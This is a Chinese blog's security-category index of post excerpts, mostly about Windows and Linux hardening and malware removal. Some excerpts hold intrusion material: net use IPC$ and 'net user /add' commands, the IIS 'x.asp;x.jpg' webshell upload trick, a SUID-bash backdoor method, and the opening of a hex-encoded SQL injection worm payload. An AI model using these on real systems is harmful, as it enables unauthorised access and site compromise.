随笔分类 -  安全

sql server 2000安全设置
摘要:微软的SQL Server是一种广泛使用的数据库,很多电子商务网站、企业内部信息化平台等都是基于SQL Server上的,多数管理员认为只要把网络和操作系统的安全搞好了,那么所有的应用程序也就安全了。大多数系统管理员对数据库不熟悉,而数据库管理员又对安全问题关心太少,而且一些安全公司也忽略数据库安全,这就使数据库的安全问题更加严峻了。数据库系统中存在的安全漏洞和不当的配置通常会造成严重的后果,而且都比较难以发现。数据库应用程序通常同操作系统的最高管理员密切相关。广泛SQL Server数据库属于“端口”型的数据库,这就表示任何人都能够用分析工具试图连接到数据库上,从而绕过操作系统的安全机制,进 阅读全文

posted @ 2011-06-25 17:42 与时俱进 阅读(697) 评论(0) 推荐(0) 编辑

net use命令详细解释
摘要:其他内容net use ipipc$ /user: 建立IPC空链接net use ipipc$ 密码 /user:用户名 建立IPC非空链接net use h: ipc$ 密码 /user:用户名 直接登陆后映射对方C:到本地为H:net use h: ipc$ 登陆后映射对方C:到本地为H:net use ipipc$ /del 删除IPC链接net use h: /del 删除映射对方到本地的为H:的映射net user 用户名 密码 /add 建立用户net user guest /active:yes 激活guest用户net user 查看有哪些用户net user 帐户名 查看帐 阅读全文

posted @ 2011-02-18 09:34 与时俱进 阅读(1040) 评论(0) 推荐(0) 编辑

Windows SC命令详解
摘要:SC命令详解(一个很有用的command)作为一个命令行工具,SC.exe可以用来测试你自己的系统,你可以设置一个批处理文件来使用不同的参数调用 SC.exe来控制服务。一.SC使用这样的语法:1. SC [Servername] command Servicename [Optionname= Optionvalues]2. SC [command]这里使用第一种语法使用SC,使用第二种语法显示帮助。下面介绍各种参数。Servername可选择:可以使用双斜线,如\\myserver,也可以是\\192.168.1.223来操作远程计算机。如果在本地计算机上操作就不用添加任何参数。Comma 阅读全文

posted @ 2011-02-18 09:30 与时俱进 阅读(2079) 评论(1) 推荐(0) 编辑

Microsoft IIS 解析文件名“x.asp;x.jpg/x.php;x.jpg”漏洞
摘要:Microsoft IIS 解析文件名“x.asp;x.jpg/x.php;x.jpg”漏洞当文件名为x.asp;x.jpg时,Microsoft IIS会自动以asp格式来进行解析。而当文件名为x.php;x.jpg时,Microsoft IIS会自动以php格式来进行解析。所以我们只要上传后是x.asp;x.jpg这样的形式,就可以执行我们的马了,测试了下,x.php;... 阅读全文

posted @ 2010-11-26 15:37 与时俱进 阅读(1967) 评论(0) 推荐(0) 编辑

你的Web系统有多少安全漏洞
摘要:Internet的开放性使得Web系统面临入侵攻击的威胁,而建立一个安全的Web系统一直是人们的目标。一个实用的方法是,建立比较容易实现的 相对安全的系统,同时按照一定的安全策略建立相应的安全辅助系统,漏洞扫描器就是这样一类安全辅助系统。   漏洞扫描就是对计算机系统或者其他网络设备进行安全相关的检测,以找出安全隐患和可被黑客利用的漏洞。作为一种保证Web信息系统和网络安全必不可 少的手段,我们有... 阅读全文

posted @ 2010-06-25 13:14 与时俱进 阅读(557) 评论(0) 推荐(0) 编辑

简便方法 手动清除JPEG图片病毒
摘要:应对JPEG图片漏洞不能只打系统补丁,因为JPEG图片漏洞存在于微软提供的一个用于图形开发的动态链接库(Gdiplus.dll)中,电子图片文件会被该系统文件使用,从而可被病毒制造者加入各种病毒代码,以用于进行偷盗密码、进行网络攻击的重要手段。   反病毒专家解释,目前该程序已经广泛应用于各种图形程序的开发,但是,系统文件只在Windows XP及以上系统中才被默认安装,因此大部分常用的非微软的应... 阅读全文

posted @ 2009-11-03 09:34 与时俱进 阅读(356) 评论(0) 推荐(0) 编辑

局域网病毒入侵原理及防范方法
摘要:计算机病毒在网络中泛滥已久,而其在局域网中也能快速繁殖,导致局域网计算机的相互感染,使整个公司网络瘫痪无法正常运做,其损失是无法估计的。    一、局域网病毒入侵原理及现象    一般来说,计算机网络的基本构成包括网络服务器和网络节点站(包括有盘工作站、无盘工作站和远程工作站)。计算机病毒一般首先通过各种途径进入到有盘工作站,也就进入网络,然后开始在网上的传播。具体地说,其传播方式有以下几种。  ... 阅读全文

posted @ 2009-10-29 09:24 与时俱进 阅读(991) 评论(0) 推荐(0) 编辑

常见病毒 木马进程速查表
摘要:常见病毒 木马进程速查表 .exe → BF Evolution      Mbbmanager.exe → 聪明基因 _.exe → Tryit       Mdm.exe → Doly 1.6-1.7 Aboutagirl.exe → 初恋情人   Microsoft.exe → 传奇密码使者 Absr.exe ͛... 阅读全文

posted @ 2009-10-26 08:41 与时俱进 阅读(1036) 评论(0) 推荐(0) 编辑

SSL VPN可能不如大家想象得那么安全
摘要:据黑帽安全大会上展示的研究成果显示,SSL VPN可能会遭到某种方式的攻击,让攻击者得以控制远程用户的机器;还有可能会在连接上去的网络里面从事破坏活动。 Intrepidus集团的高级顾问Michael Zusman表示,这个问题可能存在于SSL VPN会话一开始、就把自己安装在远程机器上的Web客户软件上。(DNS漏洞发现者Dan Kaminsky也在黑帽安全大会上作了发言,谈到了如何可以通过... 阅读全文

posted @ 2009-10-25 09:13 与时俱进 阅读(186) 评论(0) 推荐(0) 编辑

SQL注入专题--整理帖
摘要:SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别, 所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一 部分程序员在编写代码的时候,没有对用户输入数据的合法性... 阅读全文

posted @ 2009-10-15 14:26 与时俱进 阅读(447) 评论(0) 推荐(1) 编辑

对linux下perl backdoor的一段分析
摘要:背景一个朋友的服务器出现了一个莫名其妙的inetd 进程,开了 21000 端口,怀疑被入侵。登陆上去简单检查了一下,发现骇客不留神把后门的一个副本,遗留在临时目录下。经过检查是个用 perl 脚本写的后门。叫 Telnet-like Standard Daemon。后门找到了,入侵事件也基本被定性。1. 目前主机上还运行着该后门,很有可能黑客已经通过编写启动脚本,将后门加入了随机启动。2. 该主... 阅读全文

posted @ 2009-10-14 09:02 与时俱进 阅读(1004) 评论(0) 推荐(0) 编辑

恶意网页病毒十二大症状分析及修复方法
摘要:(一).默认主页被修改   1.破坏特性:默认主页被自动改为某网站的网址。   2.表现形式:浏览器的默认主页被自动设为如********.COM的网址。   3.清除方法:采用手动修改注册表法,开始菜单->运行->regedit->确定,打开注册表编辑工具,按顺序依次打 开:HKEY_LOCAL_USER\Software\Microsoft\Internet Explorer... 阅读全文

posted @ 2009-10-14 09:01 与时俱进 阅读(472) 评论(0) 推荐(0) 编辑

循序渐进,教你揪出伪装并清除木马
摘要:曾经陪伴我们多年的杀毒软件,面对日新月异的病毒和木马,它们显得很“单薄”,是乎很难再将其驱除出境,有的甚至连病毒及木马的存在都无法发 现,更别提如何进行清除。因此有时利用手工检查及清除病毒,还是有必要的,本文以伪装成系统的Wmiprvse.exe进程木马为例,来对其木马的清除做 以循序渐进的讲解。   某日笔者向往常一样,按住键盘上的“Ctrl+Alt+Del&... 阅读全文

posted @ 2009-10-12 09:34 与时俱进 阅读(403) 评论(0) 推荐(0) 编辑

几个小绝招增强系统对木马和病毒防范
摘要:一、问题的提出   大部分的木马及部分的病毒是通过注册表的自启动项或文件关联或通过系统服务实现自启动的,那是否有一种方法可以防止木马或病毒修改注册表项及增加服务呢?   二、问题的解决   Windows2000/XP/2003的注册表是可以设置权限的,只是我们比较少用到。设置以下注册表键的权限:   1、设置注册表自启动项为everyone只读(Run、RunOnce、RunService),防... 阅读全文

posted @ 2009-10-12 09:20 与时俱进 阅读(360) 评论(0) 推荐(0) 编辑

杀毒软件被病毒禁用故障的解决之道
摘要:网络上的病毒越来越猖獗,如今病毒修改杀毒软件的注册表,禁用杀毒软件已经不是什么新鲜事。笔者也是深受其害,最近笔者的电脑感染了 ghost.pif,这个文件在杀毒软件目录里面伪装成一个恶意的Ws2_32.dll文件,使杀毒软件启动不能正常加载Ws2_32.dll,杀毒软件 启动失败,并且提示“0xc00000ba”错误。   于是笔者新建了一个名为antivir的批处理,阻止... 阅读全文

posted @ 2009-10-12 09:17 与时俱进 阅读(397) 评论(0) 推荐(0) 编辑

详解新网银木马清除技巧
摘要:近日,金山反病毒中心截获一特殊的新网银木马病毒,该木马会删除系统的关键登录程序userinit.exe,导致系统重启后反复登录,无法进入桌面。金山反病毒中心已经紧急升级处理该病毒,将提供了系统修复方案。 以下是新网银木马病毒的详细分析: 病毒名:Win32.Troj.BankJp.a.221184 这是一个具有破坏性的新网银木马病毒。会查找“个人银行专业版”的窗口并盗取网... 阅读全文

posted @ 2009-09-30 17:34 与时俱进 阅读(801) 评论(0) 推荐(0) 编辑

如何看Linux服务器是否被攻击
摘要:俗称“脚本小鬼”的家伙是属于那种很糟糕的黑客,因为基本上他们中的许多和大多数人都是如此的没有技巧。可以这样说,如果你安装了所有正确的补丁,拥有经过测试的防火墙,并且在多个级别都激活了先进的入侵检测系统,那么只有在一种情况下你才会被黑,那就是,你太懒了以至没去做该做的事情,例如,安装BIND的最新补丁。 一不留神而被黑确实让人感到为难,更严重的是某些脚本小鬼还会下载一些众所周... 阅读全文

posted @ 2009-09-22 10:16 与时俱进 阅读(1594) 评论(0) 推荐(0) 编辑

Linux 下通过脚本实现远程自动备份
摘要:考虑到在本机上备份数据,一旦该机器硬盘出现故障,数据无法取出。远程手动备份数据费时费力且不及时。最好的方法就是通过脚本实现远程自动互备。但远程无 论是通过SSH登陆,还是通过scp拷贝文件都需要输入密码。为了克服这个问题,首先需要实现不需要密码的SSH登陆,这样就可以使用 rsync,scp,rexec等命令来做的远程备份了。 1. 设置无需密码的ssh登陆,方法如下: 假设A,B两服务器,现在需... 阅读全文

posted @ 2009-09-18 13:01 与时俱进 阅读(295) 评论(0) 推荐(0) 编辑

介绍一个超初级的linux后门制作方法
摘要:众所周知,Linux的文件权限如: 777;666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件。所以我们只需要将bash复制出来到另一个地方, 然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了。   下面来介绍一下文件权限的具体意义   一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号... 阅读全文

posted @ 2009-09-18 12:55 与时俱进 阅读(682) 评论(1) 推荐(0) 编辑

一个MS SQL蠕虫代码
摘要:以下是十六进制转换后的,解码后的文件在下部,这个语句会在网站各个文件末尾插入一句JS 代码。---------------------------------------------------------------------------------';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C00410052004... 阅读全文

posted @ 2009-09-14 09:04 与时俱进 阅读(472) 评论(0) 推荐(0) 编辑

友情链接:同里老宅院民居客栈